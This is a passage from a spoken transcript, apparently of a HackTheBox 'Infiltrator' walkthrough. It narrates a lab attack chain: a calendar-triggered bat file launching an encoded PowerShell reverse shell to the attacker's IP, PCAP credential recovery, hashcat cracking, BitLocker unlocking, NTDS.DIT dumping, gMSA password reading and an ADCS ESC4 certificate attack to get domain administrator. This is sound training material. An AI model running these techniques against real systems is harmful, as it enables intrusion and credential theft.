look like it. Here's that chat room we looked at. If we go over to calendar, I don't see, I was expecting to see like a bunch of items. Let's do sync calendar, refresh. There we go. So we can see your calendar is filled with things, and every day there's at 12 a.m. it's going to open a website, infiltrator.htb, right? So what we could do is have this run a command. If we do new event, and this is only on the Windows application. If you're using any of the other apps, it's just not going to work. So we can do this. Let's do repeat. I wish there was like an every minute. And then we can make an application. So what we should do is put a reverse shell on the box since we have a shell there, and then we can run the app at whatever time it is. And as long as this app is open on the computer, it should execute. So let's switch back over to our Linux box where we have WinRM open. I think that's in this pane. 5. There we go. Awesome. And now we just need to create a bat file or an executable that will send us a reverse shell. So to do that, we're just going to go back to our box, go in our www directory, and do copy cp user share nashang. Is it shells? Yep, shells. Then invoke PowerShell TCP oneline.ps1 over to shell.ps1. We can edit this, and then I'm going to use that top one. And let's see, we can do 10, 10, 14, 8. Then 9001. That seems fine. Save that. Exit. And let's see. We have to create our reverse shell. So I'm just going to create a bat file. We'll do v shell.bat. We can say PowerShell. Trying to think of the best way to do this. I guess we'll just do a one-liner. I was thinking about a web cradle, but we can try this real quick. Do no profile, window style of hidden, execution policy bypass. And then we can do encoded command. I think we just need -enc. And we need to convert this shell.ps1 into base64 that Windows reads. So I convert -target UTF-16 little endian. As it UTF. Okay. Then base64 W0. Let's copy this. V shell.bat. Paste that. That looks fine. Cat shell.bat. And I'm going to run this command, make sure it works, and then we will put it into a bat file and then try to execute it through the time. Run. That doesn't seem good. Oh, wait. There we go. We got a shell. dir. Awesome. Exit. Get a prompt back. So let's do a curl HTTP 10.10.14.8 port 8000 shell.bat -o shell.bat. Looks like the web server is not running. Start that back up. Okay. That's running. We do a date. It is 3:55:02. So I'm going to do it for 3:57. I don't have, do I have the ability? 57. And we'll set the application. I wonder if, I can't remember if it's application on the box or we upload. File does not exist. I guess I should have it on my box. Cat shell.bat. Let's just copy this. There we go. Go to Visual Studio. Let's go Notepad. That did not work. Notepad. Paste this. File save. Let's do shell.bat. All files. Save it. Seems to be good. Now let's go new event. Run application. Specify shell.bat. And I'm just going to set it for 5 p.m. We will save that. And I'm also going to create another one at 4 p.m. because I'm not exactly sure which is it. So hopefully one of those will hit, and then we will get a shell. So I'm going to go back to my parrot box, and then we will wait. So if we run date again, I may have missed it. Let's do, I guess, 5:03, new event. I wish it was like an every minute, right? Shell, change it to 5:03, 5:03 p.m. Can I not do this? Save. Okay, that looked fine. We'll do 4:03. Save. Now, hopefully, we can get back to my VM quickly. Run a date. Okay. I'm going to sleep for a minute And hopefully when we come back, we'll have a shell run. And we did not get a shell. So I'm going to run the command get time zone. And I'm just going to make sure we're on the right time zone. So UTC Pacific Standard Time. I'm going to go to my VM. Let's run date again. 4:11. So let's go back here. And we will run PowerShell, get time zone. Okay. Same time zone. So let's do a new event. Actually, I just noticed we're running the application because that's where we saved it. It's probably trying to run that on the on the server and failing because it doesn't exist. So let's put it in program data. So the path also matters. So time zone and path probably do matter. New event. Let's do run an application. It's 4:09. Let's do 6:11. We can do 04. Let's do 15 on PM. And then C:, program data. It's really wonky that we have to do this. Save, okay. So we did 4:15, and we'll also do 5:15. The reason why I'm doing that is because that's kind of what this application is defaulting to. So maybe like the application's on a different time zone. I really don't know, but figured better be safe than sorry. So now we have 16:15 and 17:15 C:, program data shell.bat on both of them. So hopefully this works. I wonder if we can right click, sync, refresh, sync, refresh, just in case that matters. And if I could get this back over, I would be happy. There we go. So running date now, we have probably 2 minutes. So let's do sleep. We'll do 60. And I will come back when this is finished. And it looks like we have a shell. I forgot to use rlwrap, so I don't have my up arrows, but we'll just make do because it is a pain getting this shell. We see we're Olivia Martinez, so let's go into her home directory so we can do o.star, and that should get us there. And if we do a tree command here, we can see all the files, nothing really here. If we do the same thing from app data, let's see if there's anything different. This is going to be the temp directory, probably with all those pictures. But we can see received files has a network capture. So let's go into this. It's probably in the roaming. So let's do cd roaming. What's the next one? Output messenger. FAA. So the last one was ja. This is fa. Dir. Let's see. Received files. And then I think it was the 203, right? Yeah, CD 203301. And we have this network capture. So I'm just going to copy this over to C:/ program data. And we have a WinRM shell here. And this will just let us download this PCAP. So we can just do a download, copy, paste. And we should have the PCAP here. Grep. There we go. It's this network capture. So let's open this up in Wireshark. And what I'm looking for is just what is in this, right? So if we look at it, we see a bunch of HTTP traffic scrolling down. That's probably HTTPS maybe, TLS v2. What port is that? Let's see. Is that here? Transmission, port 443. So that's HTTPS. I'm just going to filter for HTTP to start off. And we can see what endpoints we can see. So we do a git / and then we have this post to login. So if we look at this, the login is a post and it's sending form authorization. What was the username password? Follow TCP stream. apparently that is all it's doing. We don't have anything sensitive there. So let's go back, search back for HTTP. Let's see, we have a BitLocker archive, a post to change auth token. And if we're looking at it, we have potentially a password here. We have new auth token is equal to Martinez password. Let's do follow HTTP. Let us grab this. NXE SMB 10101131 -UO Martinez -P. Put in this password. And it's good. So we have got Olivia Martinez's password. There's also that BitLocker piece. Let's see, is there anything else before we start looking at BitLocker? It's doing a get on login. If it was a post, I'd be more curious at it since you could have a username and password there, but that's just a get. Files, login. So nothing too interesting. So let's go ahead and export objects and let's save this BitLocker backup. So if we I can't just save one, I guess we'll save all. Let's just create a new folder, make dir, we'll call this PCAP files. Go here, open, and do we have them all? We do. So if we go into PCAP files, let's see which BitLocker backup is correct. That's just HTML. So I bet if we did like Firefox on that, will it actually open? It doesn't because it thinks it's a 7-zip. Move this to be the same thing .html. Wonder if we do this, we can see the page. It just looks like it is a file hosting thing, right? So the real BitLocker password is probably this, or the backup. That is a 7-zip. So we can do 7zx on that file, and it's a password. We could try that password we just got, the Olivia Martinez one. So I'm going to copy this. Let's run this again, paste it, and errored. Okay, so let's see. We can do 7-zip to John on that file, and can't find something. So let's just copy this package name and we'll go over to Google. So Google, Perl this apt install. Will this help me? Maybe. Copy this, paste. It looks like it's installing. Let's do 7-zip to John. There we go. And oh man, that is a big hash. Is that like the whole zip? Jesus. We may want to direct that to a file. Let's go to, we'll do infiltrator dot 7z hash, I guess. Let's look at this file real quick. That looks fine. It's got the file name first. So I think when we hashcat this, we should do -- username or -- user. I forget what it is, but that's the format, like user : and then hash. So let's SCP this over to the Kraken and hashcat hashes. Sage Kraken. Let's go back here. And let's see. Hashcat. And then was it hashes, infiltrator, 7-zip hash, opt word list, rock u, and -- I think it's username. Let's see if this starts cracking. It's auto detecting the hash mode. Let's see. Looks like it's going. We're initializing the drivers. And let's see. We got it attempting to crack. So I'm going to let this run and hopefully we get a hit. And there we go. It has cracked. So if we do a -- show, it should tell us the password. And it looks like it is going to be zipper. So let's go ahead and try to extract it. So let's go into our PCAP, 7ZX, was it bitlocker backup, like this. Put in the password of zipper, and it looks like it has extracted. So now there's a directory bitlocker backup. If we go in here, there is a HTML page. So if we look at this, it is in French, but I'm guessing this is going to be the backup key. We don't know exactly what this goes to, but we did have a hit on Olivia's password. So let's go up to directories again, and I'm going to do the nxcdb again. What is it? Is it proto smb creds? There we go. We have her password. And remember, RDP was on the box. So let's try nxc RDP. I guess doesn't matter. We'll do this. Martinez P. Put in this password. And it shows we have access. So I'm going to do xfree RDP. And I don't have that installed. Sudo apt install xfree RDP. Apt xfree RDP install. Go over to Google. And what package is that? There we go. Install this. And now we should be able to run xfree RDP. So xfree RDP looks good. I'm going to do /u for the user, infiltrator.htb, then O Martinez /p, the password /v dc01, infiltrator.htb, and I'm going to do plus clipboard. So hopefully it shares the clipboard between my host and the machine, because I have a feeling we're going to have to enter that BitLocker key. So we get logged in. We see she does have that output messenger open. That's why we could get the code execution through the calendar. And let's see. Open up C. This will get me to my PC. And we have E. So if we try to go here, it wants a key to unlock the drive. If we go here, I'm assuming that means key. That looks like what I copied. Password is incorrect. That's probably going to be like a serial, right? Unlock. Access new device. Am I copying like a space or something? Password is incorrect. What's the last character? -39? That is not the last character. Time limit 2 minutes. Oh God, we gotta go fast. Okay, that's copied. Paste. Enter recovery key. Unlock. There we go. So we had to enter the recovery key. So we have backups. Let's see. Users, administrator. Oh, there is so much here. Probably not going to find this in 2 minutes. Let's see. CMD. E. Is it access denied? I'm assuming we lost access. PC. Yep. More options. Recovery key. Paste. Okay. E. Tree F. Let's see. Is there anything interesting? Administrator documents backup credentials. This sounds good. So C. Users. Administrator. documents, backup credentials. I'm just going to copy this to program data because we can use winrm to easily copy this file off. So let's go back here. Go to the shell, dir, download this credential file. We can close out of that because I have a feeling it's going to disconnect me anyways. So I want to reconnect if I need anything. It's paused at 51%. That's okay. There we go. And let's see. We have backup credentials there. Let's see. Can we just extract them? Looks like we can. And let's see. Make dir backup. Let's just do it in its own directory so I can see all the files easily. I'm guessing Active Directory was what it was. So we have registry and Active Directory. So we have the NTDS.DIT. So we could do a secrets dump, and then was it local-NTDS, the file, then I think it's all lowercase, right? Dash security, registry, security, dash SAM, registry SAM. There would be dash system. Like this. Is this going to work? And it's going to start dumping. Awesome. So we could try to see if this works. So we can do nxc, smb, 10, 10, 11, 32, -u, administrator, and the hash. And we'll see. 31. There we go. And that's invalid. So we probably should just get the the NTLM hashes. So let's see, we can do, what filters can we say? User status history. So anything else? Debug, SAM. Okay, so let's just specify history and user status. So we'll do dash history, dash user status, dash pwd last set. And I'm going to output this to a file. We'll call this NTDS.dump. And let's see. We can less it. And we probably want to just get all the hashes out. So I'm going to do a grep-v AES DES on this. And let's see, what else do we want to get out of here? That. There we go. Oddly enough, it didn't get that cleaning up, which is odd. We can probably just actually grep for AAD. There we go. That's a good way to do it. That's a blank LM hash, right? So as long as we grab that, we get all the NTLMs. And that looks good. So what do we want? We have 2 weird machine accounts. That hash. So what I want to do, let's just get a list of all the hashes. So we'll do a awk-field separator on a semicolon. Print, I'm going to guess it's 3, maybe 4. 4, there we go. NTLM.text. And we have users already. So we can say nxc smb dco1.infiltrator.htb -u users.text -h ntlm.text. I'm going to also add the -k because some users are in the protected user group, which means we have to do it this way. And we probably should say continue on success. On success. There we go. And I'm just going to let this run. We'll come back when it's done because it's going to take a little while. Okay, it is all done. If I just search back for pwn, we don't have anything. So none of these hashes got us admin access to this box, but there's always more data in NTDS, right? We're just using secrets dump right now to dump the easy things. But if we use an actual tool and do a little bit of forensics on the NTDS.DIT file, we can extract a lot more information. And I think it's NTDISSECTOR. Let's see if this pulls it up. It's from Synactive. I always forget the name, but I always know it's from Synactive. And this is my normal go-to when I want to analyze this file, right? So I'm just going to do a git clone. And then we can do a python 3-m vm.vm source vm bin activate, and then pip3 install dot. And this will just like extract everything. One of the things that secrets dump doesn't do well is like deleted data, like in the recycle bin. This covers everything. We just have to have the keep del flag. I'm going to use it with this, and then we can also do all as well. But we're going to do this one first because it's quicker. And I have to copy the files here. So let's do cp ... backup active directory. It wants it in case like that. cp backup registry. Okay. So if I just run it as it says with field user, and we go into temp NTDS_sector, and here we just have one JSON file, right? If we cat this jq.less, we're going to get a bunch of information. I always like doing the less-S when I look at it because the line wrapping, all those fields that are super long, don't take up a lot of screen space, right? So we can see right now we're looking at the administrator account. If we go down, the next account, let's see, this is going to be guest. And we can see every field for the account. It's going to give us password history and all those things. But it may get us more users because if there's someone that's deleted, we'll get it, right? That's WinRM SVC. Let's see, this is going to be LAN management. And we get the description field out of this. So we have the password for this account most likely in the description, and secrets dump didn't parse description, so we didn't see it. So that's one of the reasons why I just like this tool, because it gives you absolutely everything. So you can just deep dive and hopefully you find something. It's really good when you get stuck and you have the NTDS dump, right? So we can do NXC SMB 10.10.11.31-U. What is it? I don't even know what pane I used NTDISSECTOR. There we go. LAN_management. LAN management -P. Put in that password. And we get login failure. Could swear that's right. Let's see. Maybe I misspelled the name. But we did have it on this because we actually marked that as a high value target because this one could, I think, read group policy, GPMC, or not that. It could read something. Group managed service account. That's it. LAN management. There we go. So I probably just had a typo in the name. So we can now authenticate as them. And if we do add to owned, I guess, we could also just do the outbound object control and see what they have. But we can see LAN management can read the group managed service account password of this Infiltrator service. So I want to say if we do LDAP And then there's a GMSA option, right? --GMSA. This should be able to just read all the group managed service accounts. And here we go. We have the Infiltrator service NTLM hash. So we can test this account out real quick. Let's do -H, delete this. And we can say Infiltrator SVC. There we go. And there we go. We have a successful password there. So now we're this account. So we can add this to owned. And then we could also just go in outbound object control and see what this can do. We have generic right over this template, which this is going to be AD ESC4 exploit, right? Because we can modify this template, which means we can make the template insecure and then use it to authenticate. So that's AD ESC4. If we did the cipher query of, let's go to owned, let's see, shortest path from owned objects. This will actually say, oh God, there's a lot. Let's see. Which account did that to us? This is always the danger of when we look at certificate data in Bloodhound. But we can see it is calling out AD ESC4 right there. So let's go ahead and use certify in order to exploit this. So I'm going to make sure this is on my clipboard. And we can do certify, then find, let's see. We can do -u infiltrator _ SVC. I want to say -hashes. I think it wants it like that. DC IP 10.10.11.31. Let's just show vulnerable things and output to standard out. Let's see. It looks like it's working. That's good. Failed to connect to remote registry, but it is checking web enrollment certificates. Hopefully it comes back in a couple of seconds, and then we can start the attack. There we go. We see it is calling out ESC4 on the Infiltrator template certificate, which is exactly what we had saw in Bloodhound. And we also did this exact attack on the Escape 2 machine, but it is somewhat common, I guess. So let's do certify. We'll say template. This can stay the same. And then we get rid of vulnerable and STD out. And let's see. What do we need? We need the -template flag. And then we grab the template here. And we want right default configuration, I want to say. Let's see if that's enough. It looks like it is. Are you sure you want to apply the changes? So what this is going to do is make it vulnerable to ESC1, right? And then we backed up the old template. We can see that is here. So if we wanted to restore it when we're done, we could. But now we can do certify. Let's do certify. I'm going to copy this one again. So we have the username and password there. It's request, DC. Let's get rid of all of these. So we do this request. We need the CA. And that CA is going to be here. So we can copy this, paste. And then the template, we had that in the last one. Maybe I should have just left that. Infiltrator template.json. Don't want the JSON. So we specify the template. And then I think the UPN, and that's all we need. So the user principal name, we'll do administrator at infiltrator.htb. It's going to request a certificate. And if this fails, I'm going to rerun the last step because it's always possible the cleanup reverted the change we had done. But I think I was quick enough. Hopefully I was. Timed out. That is not what I expected. Ping 10.10.11.31. Okay. Run this again. Okay, it worked. I don't know what exactly happened for it to time out, but we have a certificate here. So now we should be able to do certify auth, BFX, administrator, specify the DC IP. PFX. There we go. Should get a TGT, and then we'll get the hash for administrator, and then we should be able to just get right into the box. So hopefully this gets the TGT soon. There we go. We have a hash right here, and we can copy this. We can do NXC SMB 10.10.11.31 U administrator -H, paste this in to just test. And come on, it says pwned. So that is the shell. So if we do ps exec administrator at 10.10.11.131, I think -hashes will work. I accidentally put the A there. Let's see. Is it going to authenticate? No route to host. Try it again. Something must be going on with my... Oh, I have 131. There we go. Uploading. If the shell doesn't work, I'm going to assume Defender's on, then we'd use like SMB exec, but it came back. So we can do CD users, administrator, desktop, and this box is finally done. So hope you guys enjoyed that. Take care, and I will see you all next time. Oh, wait. I kind of forgot. There was something we wanted to show. Let's close out of this. Do we have NTDISSECTOR here? That's not it. Where was that? Here? Yeah. So I'm going to go back here. -F. There we go. We can do all here. And then I'm just going to show you all the objects this actually collects. And then we'll wrap up the video, because there's a lot of data in the NTDS.DIT. So there we go. It's now extracted. Let's do temp, NTDISSECTOR out. And we have a lot. So pretty much the entire Active Directory domain in like JSON files, right? So if we want, we can like look at the DNS node, JQ dot. Not sure exactly what all this data is good for, but if you want data out of NTDS.DIT, I would highly recommend this tool. Most likely you'll only want the users, but there is so much more information in it. So that's going to be the video. Take care, and I will see you all next time.